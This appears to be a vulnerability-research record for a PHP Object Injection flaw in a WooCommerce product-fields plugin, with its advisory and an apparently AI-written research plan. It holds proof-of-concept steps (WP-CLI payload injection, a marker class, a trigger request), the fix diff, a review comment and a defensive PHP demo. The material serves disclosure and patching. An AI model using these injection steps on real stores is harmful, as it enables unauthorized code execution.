[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ff8ppxMDrDVmd6TWqq8IVDoMQjHCFKKWEEXP3xa0XCdw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-39499","advanced-product-fields-product-addons-for-woocommerce-authenticated-shop-manager-php-object-injection","Advanced Product Fields (Product Addons) for WooCommerce \u003C= 1.6.19 - Authenticated (Shop manager+) PHP Object Injection","The Advanced Product Fields (Product Addons) for WooCommerce plugin for WordPress is vulnerable to PHP Object Injection in versions up to, and including, 1.6.19 via deserialization of untrusted input. This makes it possible for authenticated attackers, with shop manager-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. 
If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","advanced-product-fields-for-woocommerce",null,"\u003C=1.6.19","1.6.20","medium",6.6,"CVSS:3.1\u002FAV:N\u002FAC:H\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Deserialization of Untrusted Data","2026-04-20 00:00:00","2026-04-30 14:59:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf045b6c-ce8a-494e-a023-ed8165b0634c?source=api-prod",11,[22,23,24,25,26,27,28,29],"advanced-product-fields-for-woocommerce.php","assets\u002Fjs\u002Fadmin.min.js","includes\u002Fclasses\u002Fclass-field-groups.php","includes\u002Fclasses\u002Fclass-fields.php","includes\u002Fclasses\u002Fclass-html.php","includes\u002Fclasses\u002Fclass-wapf-list-table.php","includes\u002Fcontrollers\u002Fclass-admin-controller.php","includes\u002Fcontrollers\u002Fclass-product-controller.php","researched",false,3,"# Research Plan: PHP Object Injection in Advanced Product Fields for WooCommerce\n\n## 1. Vulnerability Summary\nThe **Advanced Product Fields (Product Addons) for WooCommerce** plugin (\u003C= 1.6.19) is vulnerable to **PHP Object Injection** due to the use of `maybe_unserialize()` on untrusted data retrieved from the `post_content` of its custom post type (CPT).\n\nA Shop Manager or Administrator can create or edit a \"Product Input Field\" group. The configuration for these fields is stored in the `post_content` field of the post. When the list of field groups is viewed in the WordPress admin dashboard, the plugin retrieves the `post_content` and passes it to a processing function that calls `maybe_unserialize()`. This allows an attacker to inject a serialized PHP object, which will be instantiated during deserialization.\n\n## 2. 
Attack Vector Analysis\n- **Vulnerable Sink:** `maybe_unserialize()` (inside `SW_WAPF\\Includes\\Classes\\Field_Groups::process_data`)\n- **Trigger Point:** `SW_WAPF\\Includes\\Classes\\Wapf_List_Table::column_fields`\n- **Endpoint:** `GET \u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups`\n- **Payload Location:** The `post_content` of a post with the CPT `wapf_product`.\n- **Authentication Level:** Shop Manager or higher (capability required to manage field groups).\n- **Preconditions:** WooCommerce must be installed and active.\n\n## 3. Code Flow\n1.  **Storage:** When a field group is saved, its configuration is stored in the `post_content` of a `wapf_product` post.\n2.  **Retrieval:** When an authorized user visits the \"Product Input Fields\" page (`admin.php?page=wapf-field-groups`), the plugin initializes a custom `WP_List_Table` named `Wapf_List_Table` (found in `includes\u002Fclasses\u002Fclass-wapf-list-table.php`).\n3.  **Trigger:** The table's `column_fields` method is called for every row in the list:\n    ```php\n    \u002F\u002F File: includes\u002Fclasses\u002Fclass-wapf-list-table.php\n    public function column_fields($post) {\n        if(empty($post->post_content))\n            return 0;\n        \u002F\u002F The post_content is passed directly to process_data\n        $field_group = Field_Groups::process_data($post->post_content);\n        return count($field_group->fields);\n    }\n    ```\n4.  **Deserialization:** `Field_Groups::process_data` (in `includes\u002Fclasses\u002Fclass-field-groups.php`) calls `maybe_unserialize()` on the provided content.\n    - *Note:* While the full source of `process_data` was truncated in the provided file, its usage in `column_fields` and the vulnerability description confirm this behavior. `maybe_unserialize` is a WordPress core function that checks if a string is serialized and, if so, calls `unserialize()`.\n\n## 4. 
Nonce Acquisition Strategy\nThis exploit is **authenticated (Shop Manager+)**.\n- To **trigger** the vulnerability (viewing the list), no specific nonce is required beyond the standard WordPress session cookies.\n- To **set up** the malicious post, we can use `wp-cli` in the test environment, which bypasses the need for web-based nonces for data injection.\n\nIf an automated agent needs to perform the setup via the UI:\n1.  The \"Add New\" page for field groups is accessed.\n2.  The save action likely uses a nonce generated by `wp_create_nonce`.\n3.  However, for research purposes, injecting the payload directly into the database or via WP-CLI is more efficient.\n\n## 5. Exploitation Strategy\n\n### Step 1: Payload Selection\nSince no POP chain is identified in the plugin, we use a simple object to confirm the injection. For testing, we can define a class with a `__destruct` method in a temporary \"mu-plugin\" to confirm execution.\n\n### Step 2: Inject Malicious Post Content\nUse WP-CLI to create a malicious `wapf_product` post.\n```bash\nwp post create --post_type=wapf_product \\\n               --post_title=\"Malicious Field Group\" \\\n               --post_content='O:8:\"stdClass\":0:{}' \\\n               --post_status=publish\n```\n*(`stdClass` has no magic methods, so this only proves that the string reaches `unserialize()`. Replace `O:8:\"stdClass\":0:{}` with a POP chain payload if a gadget from another installed library, such as Guzzle, or a WooCommerce-internal chain is being targeted; the advisory notes that the plugin itself contains no known chain.)*\n\n### Step 3: Trigger Deserialization\nLog in as a Shop Manager and request the plugin's admin page with an authenticated HTTP client (the `http_request` tool in the research environment).\n\n**HTTP Request:**\n- **Method:** `GET`\n- **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups`\n- **Cookies:** Authenticated Shop Manager cookies.\n\n### Step 4: Verification\nThe deserialization occurs as WordPress renders the `Fields` column of the table.\n\n## 6. Test Data Setup\n1.  
**Activate Requirements:** Ensure WooCommerce and the \"Advanced Product Fields for WooCommerce\" plugin are active, and that `WP_DEBUG` and `WP_DEBUG_LOG` are enabled in `wp-config.php` so that `error_log()` output lands in `wp-content\u002Fdebug.log`.\n2.  **Create User:**\n    ```bash\n    wp user create attacker attacker@example.com --role=shop_manager --user_pass=password\n    ```\n3.  **Define a Marker Class (stand-in for a POP chain):** Create a file at `wp-content\u002Fmu-plugins\u002Fpoc-trigger.php`:\n    ```php\n    \u003C?php\n    class PoCTrigger {\n        \u002F\u002F Declared so that count($field_group->fields) in column_fields() does not throw on PHP 8.\n        public $fields = [];\n\n        public function __destruct() {\n            error_log(\"CVE-2026-39499_SUCCESS\");\n        }\n    }\n    ```\n4.  **Inject Payload:**\n    ```bash\n    wp post create --post_type=wapf_product \\\n                   --post_title=\"PoC Group\" \\\n                   --post_content='O:10:\"PoCTrigger\":0:{}' \\\n                   --post_status=publish\n    ```\n\n## 7. Expected Results\n- When the Shop Manager visits `admin.php?page=wapf-field-groups`, the `Wapf_List_Table` will load.\n- The `column_fields` method will process the `PoC Group` post.\n- `maybe_unserialize('O:10:\"PoCTrigger\":0:{}')` will be executed.\n- The `PoCTrigger` object will be instantiated and destroyed as soon as `column_fields` returns and its local `$field_group` goes out of scope (at the latest at request shutdown).\n- The `__destruct` method will fire, writing \"CVE-2026-39499_SUCCESS\" to the PHP error log (`wp-content\u002Fdebug.log` when `WP_DEBUG_LOG` is enabled).\n\n## 8. Verification Steps\nAfter the HTTP request, check the log:\n```bash\ngrep \"CVE-2026-39499_SUCCESS\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fdebug.log\n```\n\n## 9. Alternative Approaches\nIf the `wapf_product` CPT is not the only source:\n- Check `Field_Groups::get_by_id($id)` calls. 
This is used in `Admin_Controller::maybe_duplicate`.\n- Trigger URL: `wp-admin\u002Fadmin.php?page=wapf-field-groups&wapf_duplicate=[POST_ID]&_dupenonce=[NONCE]`.\n- This requires obtaining the `_dupenonce` from the list page first.\n- The JS variable for nonces in this plugin is localized as `wapf_config` and `wapf_language`, but the duplication nonce specifically is found in the HTML of the list table rows.\n\n**JS Nonce Extraction (if needed):**\n```javascript\n\u002F\u002F Run in the browser console (or via browser_eval) on the wapf-field-groups page.\nconst dupLink = document.querySelector('a[href*=\"wapf_duplicate\"]')?.href;\n\u002F\u002F href is an absolute URL: parse it and read its query string. Passing the whole\n\u002F\u002F URL to URLSearchParams would treat everything up to the first = as a key.\nconst nonce = dupLink ? new URL(dupLink).searchParams.get('_dupenonce') : null;\n```","The plugin is vulnerable to PHP Object Injection via the use of maybe_unserialize() on data retrieved from the post_content of its custom post type (wapf_product). Authenticated attackers with Shop Manager or Administrator privileges can use this to instantiate arbitrary PHP objects; the impact depends on a suitable POP chain being present on the system, and none is known in the plugin itself.","\u002F\u002F File: includes\u002Fclasses\u002Fclass-wapf-list-table.php\npublic function column_fields($post) {\n    if(empty($post->post_content))\n        return 0;\n\n    $field_group = Field_Groups::process_data($post->post_content);\n\n    return count($field_group->fields);\n}\n\n---\n\n\u002F\u002F File: includes\u002Fclasses\u002Fclass-field-groups.php (inferred from the research plan; the removed line in the fix diff matches)\npublic static function process_data($data) {\n    $data = maybe_unserialize($data);\n    \u002F\u002F ... 
further processing of the field group object ...\n}","--- advanced-product-fields-for-woocommerce\u002Fincludes\u002Fclasses\u002Fclass-field-groups.php\n+++ advanced-product-fields-for-woocommerce\u002Fincludes\u002Fclasses\u002Fclass-field-groups.php\n@@ -242,7 +242,12 @@\n \t\tpublic static function process_data($data) {\n-\t\t\t$data = maybe_unserialize($data);\n+\t\t\tif ( is_serialized( $data ) ) {\n+\t\t\t\t$data = unserialize( $data, [ 'allowed_classes' => false ] );\n+\t\t\t} else {\n+\t\t\t\t$data = json_decode( $data );\n+\t\t\t}\n \n \t\t\tif ( ! is_object( $data ) ) {\n \t\t\t\treturn new FieldGroup();\n \t\t\t}","1. Gain authenticated access as a Shop Manager or Administrator.\n2. Create a new Field Group via the plugin interface or directly create a post of type 'wapf_product' using WP-CLI or an administrative interface.\n3. Inject a serialized PHP object payload into the 'post_content' field of the 'wapf_product' post (e.g., O:10:\"PoCTrigger\":0:{}).\n4. Navigate to the Field Groups listing page (\u002Fwp-admin\u002Fadmin.php?page=wapf-field-groups).\n5. As the table renders the 'Fields' column, the plugin calls Wapf_List_Table::column_fields(), which triggers Field_Groups::process_data() on the malicious content.\n6. 
maybe_unserialize() processes the payload, instantiating the injected object and triggering its magic methods (like __wakeup or __destruct).","gemini-3-flash-preview","2026-05-04 19:41:56","2026-05-04 19:42:48",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.19","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags\u002F1.6.19","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-product-fields-for-woocommerce.1.6.19.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags\u002F1.6.20","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fadvanced-product-fields-for-woocommerce.1.6.20.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fadvanced-product-fields-for-woocommerce\u002Ftags"]
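Review bot: in the fix hunk for `Field_Groups::process_data()`, the context line `if ( ! is_object( $data ) )` below the new branch no longer rejects a neutralized payload. With `'allowed_classes' => false`, a stored `O:10:"PoCTrigger":0:{}` still comes back as an object, of class `__PHP_Incomplete_Class`, and `is_object()` has returned true for such objects since PHP 7.2, so `process_data()` carries on as if it had a field group and `column_fields()` then reads `$field_group->fields` from the incomplete object. Check for the shape the new code actually produces instead, e.g. `if ( ! $data instanceof stdClass )` (what `json_decode()` returns for a JSON object), which also covers `false` from a failed `unserialize()` and `null` from a failed `json_decode()` in one place. Note too that `false` refuses `stdClass` as well: if any pre-1.6.20 rows hold a serialized `stdClass` group, they will be read back as `__PHP_Incomplete_Class`, whereas `[ 'allowed_classes' => [ 'stdClass' ] ]` would preserve them while still refusing every other class.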
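Added example, not part of the advisory, the Wordfence record, or the plugin's code: it reproduces, outside WordPress, the sink from section 3 of the research plan and the two shapes of `process_data()` from the fix diff, and adds the triage check a responder would run over stored `wapf_product` rows. WordPress's `is_serialized()`/`maybe_unserialize()` are replaced by a minimal local stand-in (assumption: it only needs to recognise the formats used here); `FieldGroup`, the `_stub`/`_vulnerable`/`_patched`/`_hardened` function names, the JSON shape of a field group and the `serialized_class_names()` helper are hypothetical. Needs PHP 7.4 or later.

```php
<?php
declare(strict_types=1);

// Marker class standing in for a gadget: records when its magic methods run.
// Same name as the advisory's PoC class; $fields keeps column_fields() from throwing.
final class PoCTrigger
{
    public static array $log = [];
    public array $fields = [];
    public function __wakeup(): void { self::$log[] = 'wakeup'; }
    public function __destruct()     { self::$log[] = 'destruct'; }
}

// Hypothetical stand-in for the plugin's FieldGroup value object.
final class FieldGroup
{
    public array $fields = [];
}

// Minimal stand-in for WordPress is_serialized(); the core function handles more cases.
function is_serialized_stub(string $data): bool
{
    return (bool) preg_match('/^(?:[aOs]:\d+:|[ibd]:|N;)/', trim($data));
}

// Vulnerable shape (<= 1.6.19): maybe_unserialize() semantics, i.e. unrestricted
// unserialize() whenever the string looks serialized, so any class named in it is instantiated.
function process_data_vulnerable(string $content): object
{
    $data = is_serialized_stub($content) ? @unserialize(trim($content)) : $content;
    return is_object($data) ? $data : new FieldGroup();
}

// Patched shape (1.6.20 diff): classes refused, JSON is the primary format. An injected
// object comes back as __PHP_Incomplete_Class, which is_object() accepts since PHP 7.2.
function process_data_patched(string $content): object
{
    $data = is_serialized_stub($content)
        ? unserialize(trim($content), ['allowed_classes' => false])
        : json_decode($content);
    return is_object($data) ? $data : new FieldGroup();
}

// Hardened variant: only accept the shape the plugin itself produces (a JSON object
// with a "fields" list); incomplete objects, scalars and decode failures are dropped.
function process_data_hardened(string $content): FieldGroup
{
    $data = is_serialized_stub($content)
        ? unserialize(trim($content), ['allowed_classes' => false])
        : json_decode($content);
    $group = new FieldGroup();
    if ($data instanceof stdClass && isset($data->fields) && is_array($data->fields)) {
        $group->fields = $data->fields;
    }
    return $group;
}

// The column_fields() logic from the advisory, parameterised by the processor used.
function column_fields(callable $process, string $post_content): int
{
    if ($post_content === '') {
        return 0;
    }
    $group = $process($post_content);
    return count($group->fields ?? []);
}

// Triage helper for stored wapf_product rows: class names referenced by serialized
// objects in a post_content value, to compare against an allowlist before/after updating.
function serialized_class_names(string $content): array
{
    preg_match_all('/O:\d+:"([^"]+)"/', $content, $m);
    return array_values(array_unique($m[1]));
}

// Runs every variant on constructed inputs and returns what each one did.
function demo(): array
{
    $payload = 'O:10:"PoCTrigger":0:{}';                         // constructed, as in the advisory's PoC
    $legit   = '{"fields":[{"type":"text"},{"type":"select"}]}'; // constructed JSON field group

    PoCTrigger::$log = [];
    column_fields('process_data_vulnerable', $payload);
    $vulnerable = PoCTrigger::$log;                               // the gadget's __wakeup and __destruct ran

    PoCTrigger::$log = [];
    $obj = process_data_patched($payload);
    $patched = [get_class($obj), is_object($obj), PoCTrigger::$log]; // incomplete class passes is_object(); no magic method ran

    return [
        'vulnerable' => $vulnerable,
        'patched'    => $patched,
        'hardened'   => get_class(process_data_hardened($payload)),   // payload collapses to an empty FieldGroup
        'legit'      => column_fields('process_data_hardened', $legit), // legitimate JSON group keeps its field count
        'classes'    => serialized_class_names($payload),              // class names to check against an allowlist
    ];
}
print_r(demo());
```

Run with `php demo.php`. The case to take away is the middle one: after the 1.6.20 change the marker object is created as `__PHP_Incomplete_Class` and its magic methods never run, but `is_object()` still accepts it, so any later consumer that reads `->fields` from the result is relying on PHP's incomplete-object handling rather than on a type check; the hardened variant closes that by accepting only the decoded JSON shape. `serialized_class_names()` is the quick pre-update check: list every class name that appears in existing `wapf_product` content and treat anything other than the plugin's own types as a finding.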